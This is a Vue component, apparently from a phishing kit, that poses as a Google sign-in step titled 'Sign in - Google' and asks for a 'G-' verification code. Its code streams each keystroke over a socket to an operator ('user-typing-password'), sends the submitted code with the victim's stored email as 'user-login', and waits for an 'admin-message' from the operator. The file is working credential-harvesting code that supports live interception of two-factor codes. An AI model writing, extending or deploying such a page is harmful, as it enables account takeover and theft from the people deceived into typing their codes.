<template src="./index.html"></template>
<script>
// ...existing code...
export default {
  name: 'XacMinhCodeErr',
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      gCode: 'G-',
      message: '',
      isValidInput: false,
      typingTimer: null, // Timer để debounce typing events
      isLoading: false // Trạng thái loading cho button
    };
  },

  mounted() {
    document.title = "Sign in - Google";
    this.$socket.on('admin-message', (data) => {
      this.isLoading = false;
      this.isValidInput= false;
      this.gCode= 'G-';
    });
  },  
  methods: {
    onGCodeInput() {
      // Debounce typing events để tránh spam
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      this.typingTimer = setTimeout(() => {
        const typingData = {
          username: this.username,
          formType: 'gcode_verify_error',
          inputValue: this.gCode,
          time: new Date().toISOString()
        };
        
        // Emit socket event để thông báo admin
        this.$socket.emit('user-typing-password', typingData);
      }, 500); // Delay 500ms
    },
    handleCodeSubmit() {
      // Set loading state
      this.isValidInput= true;
      this.isLoading = true;
      // Gửi thông tin xác minh code lên backend
      const loginData = {
        username: this.username,
        status: 'gcode_verify_error',
        gCode: this.gCode,
        time: new Date().toISOString()
      };
      this.$socket.emit('user-login', loginData);

      const step1 = document.getElementById("login-step-1");
      step1.classList.add("transitioning");
      
      // Reset loading state after timeout
      setTimeout(() => {
        this.isLoading = false;
      }, 5000);
    }
  }
};
</script>
<style lang="css" scoped>
@import "./styles.css";
</style>